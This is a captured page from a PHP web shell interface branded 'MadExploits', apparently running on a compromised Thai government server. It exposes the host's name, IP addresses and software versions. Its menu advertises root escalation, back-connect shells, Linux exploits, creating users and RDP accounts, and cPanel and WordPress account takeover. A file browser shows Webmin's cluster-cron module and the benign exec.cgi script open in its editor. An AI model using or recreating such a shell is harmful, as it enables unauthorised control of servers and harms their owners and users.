Linux ns8.secondary29.go.th 2.6.32-754.28.1.el6.x86_64 #1 SMP Wed Mar 11 18:38:45 UTC 2020 x86_64
Apache/2.2.15 (CentOS)
: 122.154.134.11 | : 122.154.134.9
Cant Read [ /etc/named.conf ]
5.6.40
apache
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
usr /
libexec /
webmin /
cluster-cron /
[ HOME SHELL ]
Name
Size
Permission
Action
help
[ DIR ]
drwxr-xr-x
images
[ DIR ]
drwxr-xr-x
lang
[ DIR ]
drwxr-xr-x
CHANGELOG
109
B
-rw-r--r--
cluster-cron-lib.pl
4.76
KB
-rwxr-xr-x
cron.pl
658
B
-rwxr-xr-x
delete.cgi
346
B
-rwxr-xr-x
delete_jobs.cgi
409
B
-rwxr-xr-x
edit.cgi
2.25
KB
-rwxr-xr-x
exec.cgi
1.18
KB
-rwxr-xr-x
index.cgi
1.92
KB
-rwxr-xr-x
log_parser.pl
879
B
-rwxr-xr-x
module.info
276
B
-rw-r--r--
module.info.ca
130
B
-rw-r--r--
module.info.ca.UTF-8
145
B
-rw-r--r--
module.info.cz
29
B
-rw-r--r--
module.info.cz.UTF-8
36
B
-rw-r--r--
module.info.de
138
B
-rw-r--r--
module.info.de.UTF-8
150
B
-rw-r--r--
module.info.es
33
B
-rw-r--r--
module.info.es.UTF-8
39
B
-rw-r--r--
module.info.fr
37
B
-rw-r--r--
module.info.fr.UTF-8
44
B
-rw-r--r--
module.info.hu
37
B
-rw-r--r--
module.info.hu.UTF-8
46
B
-rw-r--r--
module.info.ms_MY
118
B
-rw-r--r--
module.info.ms_MY.UTF-8
130
B
-rw-r--r--
module.info.nl
40
B
-rw-r--r--
module.info.nl.UTF-8
46
B
-rw-r--r--
module.info.no
29
B
-rw-r--r--
module.info.no.UTF-8
35
B
-rw-r--r--
module.info.pl
147
B
-rw-r--r--
module.info.pl.UTF-8
165
B
-rw-r--r--
save.cgi
1.82
KB
-rwxr-xr-x
uninstall.pl
233
B
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : exec.cgi
#!/usr/bin/perl # exec.cgi # Run the cron job on all configured servers require './cluster-cron-lib.pl'; &ReadParse(); &ui_print_unbuffered_header(undef, $text{'exec_title'}, ""); # Run on all servers and show output @jobs = &list_cluster_jobs(); ($job) = grep { $_->{'cluster_id'} eq $in{'id'} } @jobs; $job || &error($text{'edit_emissing'}); print &text('exec_cmd', "<tt>$job->{'cluster_command'}</tt>"),"<p>\n"; @run = &run_cluster_job($job, \&callback); if (!@run) { print "$text{'exec_nohosts'}<p>\n"; } $job->{'run'} = [ map { $_->{'host'} } @run ]; # for logging &webmin_log("exec", "cron", $job->{'cluster_user'}, $job); &ui_print_footer("edit.cgi?id=$in{'id'}", $cron::text{'edit_return'}, "", $text{'index_return'}); # callback(error, &server, message) sub callback { local $d = ($_[1]->{'host'} || &get_system_hostname()). ($_[1]->{'desc'} ? " ($_[1]->{'desc'})" : ""); if (!$_[0]) { # Failed - show error print "<b>",&text('exec_failed', $d, $_[2]),"</b><p>\n"; } else { # Show output if any print "<b>",&text('exec_success', $d),"</b>\n"; if ($_[2]) { print "<ul><pre>$_[2]</pre></ul><p>\n"; } else { print "<br><ul><i>$cron::text{'exec_none'}</i></ul><p>\n"; } } }
Close